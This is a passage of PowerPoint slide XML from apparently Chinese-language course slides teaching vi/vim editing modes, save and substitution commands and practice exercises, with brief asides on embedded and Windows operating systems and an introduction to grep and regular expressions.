              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="標楷體"/>
                <a:ea typeface="標楷體"/>
              </a:rPr>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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4786039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在開始操作之前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要先提醒您關於按鍵大小寫的使用問題。在操作 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>時 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許多時候會使用小寫的英文按鍵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因此本節在使用按鍵命令時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若標示為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>鍵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即表示是用小寫的字母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i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。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>若您編輯的檔案內有中文的話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可能會發生出現亂碼的情形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4921444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ommand mod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模式是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預設模式，在這個模式下，使用者可以輸入指令刪除、修改、拷貝、及移動文字檔；位移游標；搜尋字串；或者離開編輯器。</a:t>
            </a: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dit mod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此模式下，使用者可以輸入文字到檔案中。輸入下列三個其中之一的指令，進入編輯模式：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)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插入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 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)o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開啟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3)a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附加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ast line mode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在指令模式下，使用者可輸入冒號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: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切換至最後一行模式，以使用進階編輯命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例如存檔或離開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並且所有指令都在指令模式執行。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3982139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1143858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如何開啟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</a:t>
            </a:r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編輯器：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”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即可開啟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編輯器並不載入任何檔案。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”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 &l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名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g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即可開啟編輯器並載入特定檔案；如果檔案不存在，則以輸入字串為檔名建立一個新的檔案。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範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”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  123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來新增一個檔案。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”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來插入字串，並輸入“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est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按下跳脫鍵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lt;Esc&g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回到指令模式及離開編輯器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wq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!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存檔並離開編輯器，”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!”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強迫執行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267080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藉由輸入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o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a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等指令進入至編輯模式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編輯模式下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不解釋文字為指令，因此使用者所輸入的任何字元都被視為文字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25691465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其實要切換到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>insert mode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>除了按 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>還可以按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[a] 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[o] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>筆者將三者的差別整理如下：</a:t>
            </a:r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A] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵：從目前游標所在位置移動到最後字元開始輸入。</a:t>
            </a:r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a] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵：從目前游標所在位置的下一個字元開始輸入。</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵：由游標之前加入資料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I] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵：由該行之首加入資料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o] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵：將原本一行資料移到下一行，並在原本行開始輸入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[O] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鍵：新增加一行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並將游標移到下一行的開頭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0146887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切換到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>insert mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>圖示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128087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如果您在進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>之後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想要開啟既有的檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>例如要開啟 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tmp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目錄中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>text.txt), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>可以按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[:] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>鍵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進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>command-line mode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>然後輸入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案的路徑及名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>若要開啟新檔案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請在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>command-line mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>輸入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案的路徑及名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"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0630672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進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>後開啟既有文字檔圖示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5678480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當輸入完檔案的文字，按下鍵盤上的跳脫鍵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Esc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就可從編輯模式回到指令模式，然後即可輸入冒號鍵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Shift +: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入最後一行模式，執行存檔或離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文字編輯器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>另存新檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/1.tx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7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615382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遷入機械或電器內部、具有專一功能和即時計算效能的電腦系統，賦予上網功能就成為物聯網設備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oT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Internet of Thing)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達成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>低生產成本、高生產力、快速上市、超小系統核心、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低運算能力、長續航力、低容量記憶空間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lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>嵌入式作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:RT-thread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uClinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Iphone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r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、Andriod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(HTC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相關產品</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>智慧型家電、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Arduino</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>開發板、樹梅派</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Raspberry Pi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、相機、網通設備</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(cisco)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、工業電腦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(IPC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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3670383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移動游標的方法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2141925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移動游標的方法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9123019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移動游標的方法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7214771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移動游標的方法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8886023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移動游標的方法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8468302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使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配合 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及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是非常有幫助的！可以讓你重複的找到一些你搜尋的關鍵字！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7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9615837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編輯指令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x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游標所在位置的字。</a:t>
            </a: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游標所在位置之後的所有字。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="1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d</a:t>
            </a:r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游標所在位置的整行文字。 </a:t>
            </a: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#)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="1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d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特定數量的行數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10dd→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0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行字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 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復原最近一次所做的變更</a:t>
            </a:r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4423681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複製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9075732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貼上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1593018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47801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zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>個人電腦作業系統：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 95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98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ME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0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>professionl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XP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Vista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7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伺服器作業系統：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows NT4.0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0 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3 Windows 2008 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows 2012 server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows 2016 server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill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605247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刪除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9392506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200" dirty="0" smtClean="0"/>
              <a:t>這個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Ctrl]+r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>是很常用的指令！一個是復原，另一個則是重做一次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8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2305243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儲存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03318455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儲存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6154756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儲存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6711420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400" dirty="0" smtClean="0"/>
              <a:t>剛剛我們提到的簡單的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>操作過程中，幾乎提到的都是以列為單位的操作。那麼如果我想要搞定的是一個區塊範圍呢？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="14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6868894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lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>區塊選擇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8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7495339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lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多檔案編輯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4323994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lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多視窗編輯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110630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上表為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多視窗編輯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文件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方法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862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7806934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補充</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:set nu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>  標示行號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p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zzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>cp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man.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> vi1.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>10j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>10j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>G &lt;end&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>i </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ABCDEabcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1234567890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:1,$s/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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</a:rPr>
              <a:t>MANPATH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jtateache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gc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean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9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6171231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cp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man.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> vi2.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>5j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3dd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>25j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>P(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>大寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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O(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>大寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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:30,$s/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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</a:rPr>
              <a:t>MANPATH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jtateache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gc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean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4904776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xfrm>
            <a:off x="679450" y="4532064"/>
            <a:ext cx="5438775" cy="4468812"/>
          </a:xfr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cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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man.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> vi3.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>35j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>20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d1G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4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4yy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16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g</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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4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6yy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11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g</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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4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6d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6j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:30,$s/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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</a:rPr>
              <a:t>MANPATH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jtateache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gc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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:30,55s/man/888/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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9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5441678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八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正規表示法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83712920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任何一個有經驗的系統管理員，都會告訴你：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>正規表示法真是挺重要的！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>』 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為什麼很重要呢？因為日常生活就使用的到啊！舉個例子來說， 在你日常使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作文書處理或程式撰寫時使用到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>搜尋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>取代</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等等的功能， 這些舉動要作的漂亮，就得要配合正規表示法來處理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9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9754190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re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以從指定文本檔案或標準輸出中查找符合條件的字符串，默認顯示其所在行的內容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rep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&l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要找的字串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gt; &l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要尋找字串的源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gt;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－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顯示行號。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－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顯示不包含指定字符串的行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－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查找時不區分大小寫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19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9604070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上表為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>參數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19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77036525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上表為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的正規則表達式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8901179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上表為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的正規則表達式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13042866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上表為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
